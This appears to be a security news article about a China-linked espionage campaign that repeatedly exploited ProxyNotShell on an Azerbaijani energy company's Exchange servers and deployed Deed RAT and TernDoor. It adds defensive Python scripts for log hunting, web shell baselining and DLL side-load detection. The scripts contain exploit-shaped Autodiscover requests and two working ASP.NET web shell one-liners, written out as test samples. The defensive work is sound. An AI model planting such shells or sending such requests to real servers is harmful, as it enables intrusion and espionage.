Azerbaijani Energy Firm Hit by Repeated Microsoft Exchange Exploitation
- Javier Conejo del Cerro
- May 14
- 5 min read

Critical infrastructure operators have long been attractive targets for cyber-espionage groups, but the repeated compromise of an Azerbaijani oil and gas company between late 2025 and early 2026 demonstrates how persistence itself has become one of the most dangerous weapons in modern cyber operations. According to Bitdefender, a China-linked threat actor associated with FamousSparrow repeatedly exploited the same Microsoft Exchange entry point across multiple attack waves, continuously regaining access even after remediation attempts.
The campaign stands out not only because of the malware deployed, including Deed RAT and TernDoor, but because of the operational discipline displayed throughout the intrusion. The attackers repeatedly returned to the same environment, adapted their tooling, established new footholds, and evolved their techniques to maintain long-term espionage access within a strategically important energy organization tied to European energy security.
Rather than operating as a single breach event, the intrusion unfolded as a sustained campaign designed to survive cleanup efforts, bypass defensive responses, and ensure continuous visibility into the victim environment.
Phase 1: Opening the Exchange Door
The intrusion began with exploitation of the Microsoft Exchange vulnerabilities known as ProxyNotShell (CVE-2022-41040, a server-side request forgery reachable through the Autodiscover endpoint, chained with CVE-2022-41082, remote code execution through the Exchange PowerShell backend). This gave the attackers their initial foothold inside the organization’s infrastructure around late December 2025.
What makes the operation particularly significant is that the same entry point continued to be abused for months. ProxyNotShell is not an unauthenticated bug: the chain requires valid credentials for the Exchange server, so every return through it implies that the attackers still held working credentials. Even after remediation attempts, the attackers came back through the same Exchange pathway, which points to incomplete patching, unrotated credentials, or persistence mechanisms that survived cleanup, and shows how an organization can stay exposed long after an initial compromise appears resolved.
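As an added example (not code from the Bitdefender report or this article), the following script hunts IIS W3C logs for the request shape that ProxyNotShell exploitation leaves behind: a request to autodiscover.json whose URL carries an "@" and proxies into the Exchange PowerShell backend, which is the same pattern Microsoft's interim URL Rewrite mitigation blocked. Because the chain needs authenticated access, the script also collects the cs-username on each hit, which is the list of accounts that must be reset before the entry point can be considered closed. The log excerpt, host names, account name and IP addresses are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed IIS W3C log excerpt (not from the Bitdefender report). The #Fields
# line is the default IIS layout; the 203.0.113.7 requests are shaped like the
# ProxyNotShell chain: the Autodiscover SSRF (CVE-2022-41040) used to reach the
# Exchange PowerShell backend (CVE-2022-41082). Account and host names are made up.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-12-27 03:14:07 10.0.0.5 POST /autodiscover/autodiscover.json @corp.example/powershell?X-Rps-CAT=REDACTED 443 CORP\svc_backup 203.0.113.7 Mozilla/5.0 - 200 0 0 812
2025-12-27 03:14:09 10.0.0.5 POST /autodiscover/autodiscover.json @corp.example/Powershell 443 CORP\svc_backup 203.0.113.7 Mozilla/5.0 - 200 0 0 640
2025-12-27 03:15:11 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.corp.example/owa/ 443 - 198.51.100.20 Mozilla/5.0 - 200 0 0 15
2025-12-27 03:16:40 10.0.0.5 POST /autodiscover/autodiscover.json @corp.example/mapi/nspi/ 443 CORP\svc_backup 203.0.113.7 Mozilla/5.0 - 200 0 0 301
"""

# The pattern Microsoft's URL Rewrite mitigation blocked: autodiscover.json, an
# "@" in the URL, and the PowerShell backend as the proxied target.
RPS_CHAIN = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)
# The SSRF shape on its own (any backend reached via autodiscover.json ... @ ...).
AUTODISCOVER_SSRF = re.compile(r"autodiscover\.json.*@", re.IGNORECASE)


@dataclass
class Hit:
    when: str
    client_ip: str
    user: str
    uri: str
    severity: str


def parse_w3c(text: str):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):      # IIS encodes spaces, so a plain split is safe
            yield dict(zip(fields, parts))


def classify(uri: str):
    if RPS_CHAIN.search(uri):
        return "high"      # SSRF chained into the PowerShell backend: the RCE leg
    if AUTODISCOVER_SSRF.search(uri):
        return "medium"    # SSRF leg only, or a different backend (mapi, ecp, ...)
    return None


def hunt(text: str) -> list[Hit]:
    hits = []
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"]
        if rec["cs-uri-query"] != "-":
            uri += "?" + rec["cs-uri-query"]
        sev = classify(uri)
        if sev:
            hits.append(Hit(f"{rec['date']} {rec['time']}", rec["c-ip"], rec["cs-username"], uri, sev))
    return hits


def accounts_to_rotate(hits: list[Hit]) -> list[str]:
    """ProxyNotShell needs valid credentials, so the cs-username on each hit is an
    account the attacker controls: it must be reset, not just the server patched."""
    return sorted({h.user for h in hits if h.user != "-"})


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for h in found:
        print(h.severity.upper(), h.when, h.client_ip, h.user, h.uri)
    print("rotate:", accounts_to_rotate(found))
```

Run it against the W3C logs of every Exchange front end, not only the one that raised the alert: a compromise that survives remediation is often one where the same account kept working against a server nobody looked at.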
The victim organization operated within Azerbaijan’s strategically important oil and gas sector, whose geopolitical relevance increased substantially following disruptions to Russian gas transit agreements and instability affecting global energy routes.
This elevated the intrusion beyond a simple corporate compromise and positioned it within the broader context of infrastructure-focused cyber-espionage operations.
Phase 2: Establishing Persistence Through Web Shells
Once access was obtained, the attackers attempted to deploy web shells inside the Exchange environment to secure persistent access. These web shells acted as hidden control points that allowed the operators to return to the compromised servers even if portions of the malware infrastructure were removed.
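Web shells on Exchange are small ASP.NET files placed under the web directories IIS already serves, so scanning only for known file names misses them. As an added example (not from the report or the article), the following script baselines the executable web files of a server tree by SHA-256, reports everything new or modified against that baseline, and runs a few content heuristics over the differences. The directory tree, file names and shell contents are constructed inline so the script runs offline; in practice the baseline comes from a known-good server on the same Exchange build, and the scan covers the FrontEnd and ClientAccess directories under the Exchange install path plus inetpub\wwwroot\aspnet_client.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Extensions IIS hands to the ASP.NET handler: a file with one of these under an
# Exchange virtual directory is executable, which is why web shells take these names.
WEB_EXTS = {".aspx", ".asmx", ".ashx", ".asax"}

# Content heuristics typical of ASP.NET web shells (constructed list, not a signature set).
SUSPECT = [
    ("eval", re.compile(rb"\beval\s*\(", re.IGNORECASE)),
    ("process", re.compile(rb"System\.Diagnostics\.Process", re.IGNORECASE)),
    ("cmd", re.compile(rb"\bcmd(\.exe)?\b", re.IGNORECASE)),
    ("request_param", re.compile(rb"Request\s*\[\s*\"", re.IGNORECASE)),
]


def hash_tree(root: Path) -> dict[str, str]:
    """SHA-256 of every executable web file under root, keyed by POSIX-style relative path."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in WEB_EXTS
    }


def diff_baseline(baseline: dict[str, str], current: dict[str, str]):
    new = sorted(set(current) - set(baseline))
    modified = sorted(k for k in current if k in baseline and baseline[k] != current[k])
    return new, modified


def content_flags(path: Path) -> list[str]:
    data = path.read_bytes()
    return [name for name, rx in SUSPECT if rx.search(data)]


def audit(root: Path, baseline: dict[str, str]) -> dict[str, dict]:
    """Files that are new or changed since the baseline, with any content heuristics they trip."""
    current = hash_tree(root)
    new, modified = diff_baseline(baseline, current)
    return {
        rel: {"status": "new" if rel in new else "modified", "flags": content_flags(root / rel)}
        for rel in new + modified
    }


def demo() -> dict[str, dict]:
    """Constructed scenario: baseline a clean tree, then plant a shell and trojan a page."""
    root = Path(tempfile.mkdtemp())
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "aspnet_client").mkdir()
    (root / "owa" / "auth" / "logon.aspx").write_text('<%@ Page Language="C#" %><html>logon</html>')
    baseline = hash_tree(root)   # in practice: taken from a known-good server on the same CU
    # Attacker activity (constructed): a dropped JScript shell and a tampered legitimate page.
    (root / "aspnet_client" / "w.aspx").write_text(
        '<%@ Page Language="JScript" %><% eval(Request["cmd"], "unsafe"); %>')
    (root / "owa" / "auth" / "logon.aspx").write_text(
        '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["x"]); %>')
    return audit(root, baseline)


if __name__ == "__main__":
    for rel, info in demo().items():
        print(f"{info['status']:8} {rel}  flags={info['flags']}")
```

The tampered logon.aspx case matters more than the dropped file: a shell written into an existing page keeps a legitimate name and timestamp-based hunts miss it, but a hash baseline does not.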
Persistence quickly became one of the defining characteristics of the campaign.
Rather than relying on a single malware implant, the attackers layered multiple footholds across the environment. This redundancy ensured that losing one access mechanism would not necessarily terminate the operation.
The campaign also involved lateral movement across the network, allowing the operators to broaden visibility into the environment and establish additional control points throughout the infrastructure.
This approach reflects the operational maturity commonly associated with advanced espionage groups, where resilience and long-term access take priority over rapid destructive activity.
Phase 3: Deed RAT Enters the Environment
During the first wave of activity, the attackers deployed Deed RAT, also known as Snappybee, a malware family considered a successor to ShadowPad and previously linked to several China-aligned espionage operations.
The malware was delivered through an evolved DLL side-loading technique that abused legitimate LogMeIn Hamachi binaries. Rather than a simple DLL swap, the attackers modified specific exported functions inside the malicious DLL, so that the malware execution chain ran when the application called those exports in its normal workflow.
This staged execution made detection significantly harder because the malicious activity appeared to be ordinary behaviour of legitimate software.
The technique also demonstrates how DLL side-loading continues evolving beyond traditional implementations. By integrating execution triggers directly into the host application’s natural control flow, the attackers reduced behavioral anomalies while improving defense evasion.
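Whatever the trojanized DLL does once its exports are called, it cannot carry the vendor's signature, and it has to sit where the host binary will find it. That gives defenders a load-time check that does not depend on behaviour. As an added example (not from the report or the article), the following script classifies Sysmon Event ID 7 (ImageLoad) records and flags a DLL loaded from the host executable's own directory when it is unsigned, invalidly signed, or carries the name of a Windows system DLL that should only ever come from the Windows directory. The event records, directory paths and file names are constructed; the field names (Image, ImageLoaded, Signed, Signature, SignatureStatus) are the ones Sysmon emits.

```python
import ntpath

# System DLLs that applications commonly resolve through the search order and that
# attackers therefore plant beside a trusted EXE. A copy of one of these outside
# the Windows directory is worth a look on its own.
COMMONLY_HIJACKED = {
    "version.dll", "dbghelp.dll", "userenv.dll", "wtsapi32.dll", "cryptbase.dll",
    "profapi.dll", "winmm.dll", "uxtheme.dll", "msimg32.dll", "dwmapi.dll",
}

# Constructed Sysmon Event ID 7 (ImageLoad) records. Paths and the host binary name
# are illustrative, not taken from the report.
EVENTS = [
    {"EventID": 7, "Image": r"C:\ProgramData\Tools\hamachi-2.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": r"C:\ProgramData\Tools\hamachi-2.exe",
     "ImageLoaded": r"C:\ProgramData\Tools\version.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": r"C:\ProgramData\Tools\hamachi-2.exe",
     "ImageLoaded": r"C:\ProgramData\Tools\hamachi-2-ui.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": r"C:\ProgramData\Tools\hamachi-2.exe",
     "ImageLoaded": r"C:\ProgramData\Tools\hamachi-2-net.dll",
     "Signed": "true", "Signature": "LogMeIn, Inc.", "SignatureStatus": "Valid"},
    {"EventID": 1, "Image": r"C:\ProgramData\Tools\hamachi-2.exe"},
]


def classify_load(ev: dict):
    """Return (severity, reason) for a suspicious same-directory DLL load, else None."""
    if int(ev.get("EventID", 0)) != 7:
        return None
    host, dll = ev["Image"], ev["ImageLoaded"]
    host_dir, dll_dir = ntpath.dirname(host).lower(), ntpath.dirname(dll).lower()
    dll_name = ntpath.basename(dll).lower()
    if dll_dir.startswith(r"c:\windows"):
        return None                   # loaded from the OS: the expected case
    if dll_dir != host_dir:
        return None                   # not side-loaded from the host's own directory
    validly_signed = (ev.get("Signed", "false").lower() == "true"
                      and ev.get("SignatureStatus") == "Valid")
    if dll_name in COMMONLY_HIJACKED:
        if validly_signed and ev.get("Signature", "") == "Microsoft Windows":
            return ("low", "system DLL name beside host but carries a valid Microsoft signature")
        return ("high", "unsigned copy of a commonly hijacked system DLL beside the host EXE")
    if not validly_signed:
        return ("medium", "unsigned or invalidly signed DLL loaded from the host EXE's directory")
    return None


def hunt(events: list[dict]) -> list[dict]:
    out = []
    for ev in events:
        verdict = classify_load(ev)
        if verdict:
            sev, reason = verdict
            out.append({"severity": sev, "host": ev["Image"],
                        "dll": ev["ImageLoaded"], "reason": reason})
    return out


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["severity"].upper(), f["dll"], "<-", f["host"], ":", f["reason"])
```

The medium case (an unsigned DLL with a vendor-looking name beside a signed vendor EXE) is the one that corresponds to a trojanized companion library of the kind described above; the check will not catch a legitimately signed but abusable DLL, so treat it as a triage filter rather than a verdict.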
Once deployed, Deed RAT provided the operators with remote access capabilities and enabled further expansion throughout the compromised environment.
Phase 4: The Return of TernDoor
Nearly a month after the first intrusion wave, the attackers returned.
This second phase involved an attempt to deploy TernDoor, another sophisticated backdoor previously observed targeting telecommunications infrastructure in South America. The malware delivery process leveraged Mofu Loader, a shellcode loader associated with threat activity linked to GroundPeony.
Although this particular deployment attempt was reportedly unsuccessful, the operation revealed a critical aspect of the campaign: the attackers were actively adapting their tooling and experimenting with different malware families to maintain operational continuity.
Rather than abandoning the target after partial disruption, the operators continuously evolved their intrusion methods.
This persistence transformed the campaign into a prolonged contest between remediation efforts and repeated reinfiltration attempts.
Phase 5: The Third Wave Arrives
By late February 2026, the threat actors returned once again.
This time, they attempted to deploy a modified version of Deed RAT using updated infrastructure, including the command-and-control domain “sentinelonepro[.]com.” The reuse of the original malware family alongside modified variants suggests active refinement of the malware arsenal during ongoing operations.
The repeated intrusions across three separate waves demonstrate a highly disciplined operational model focused on resilience, adaptability, and long-term espionage positioning.
The attackers did not simply breach the network once and disappear. They repeatedly revisited the environment, rebuilt persistence, introduced new payloads, and tested alternative access paths.
This sustained approach is increasingly characteristic of modern state-aligned cyber operations targeting critical infrastructure sectors.
Phase 6: Energy Infrastructure Under Persistent Surveillance
The geopolitical context surrounding the attack adds another important dimension to the campaign.
Azerbaijan’s growing role in European energy security following disruptions to Russian gas transit agreements and instability affecting Middle Eastern shipping routes has elevated the strategic value of regional energy infrastructure.
This makes oil and gas operators attractive intelligence targets for threat actors seeking geopolitical visibility, strategic leverage, or infrastructure access opportunities.
The intrusion also illustrates how cyber-espionage campaigns increasingly prioritize persistence over speed. Instead of conducting noisy destructive attacks, operators quietly maintain access over extended periods, enabling long-term monitoring, intelligence collection, and operational flexibility.
In many cases, the greatest danger is not the initial compromise itself, but the attacker’s ability to remain embedded inside the environment despite remediation attempts.
Measures to Fend Off Persistent Exchange Intrusions
Patch Microsoft Exchange immediately (for ProxyNotShell, the November 2022 Security Updates) and verify on every server that the fix actually applied, rather than relying on URL Rewrite mitigations alone.
Rotate all potentially compromised credentials after an intrusion; ProxyNotShell requires authenticated access, so any account seen authenticating in exploit requests is attacker-controlled until it is reset.
Audit Exchange servers for unauthorized web shells and persistence mechanisms, comparing the web directories against a known-good baseline rather than scanning for known file names alone.
Monitor for DLL side-loading: signed vendor binaries loading unsigned or foreign-signed DLLs from their own directory.
Segment critical infrastructure networks to reduce lateral movement opportunities.
Deploy continuous threat hunting rather than relying solely on reactive remediation.
Monitor outbound communications to suspicious command-and-control infrastructure.
Harden privileged access controls across operational environments.
Conduct post-remediation forensic reviews to identify hidden footholds.
Implement behavioral detection capable of identifying abnormal application workflows.
Continuously validate that previously exploited entry points cannot be reused.
Conclusion
The repeated compromise of the Azerbaijani energy company demonstrates how modern cyber-espionage campaigns increasingly behave less like isolated breaches and more like sustained military-style operations.
The attackers repeatedly exploited the same Exchange entry point, rebuilt persistence after remediation, rotated malware families, and evolved their tooling over time. Their objective was not simply to gain temporary access, but to maintain strategic presence inside a critical infrastructure environment for as long as possible.
Campaigns like this highlight a difficult reality for defenders: remediation is no longer just about removing malware. Organizations must fully eliminate persistence, rotate credentials, validate patching, monitor for reinfiltration, and assume attackers may attempt to return repeatedly.
Because in modern infrastructure espionage, the breach is often only the beginning.
The Hacker News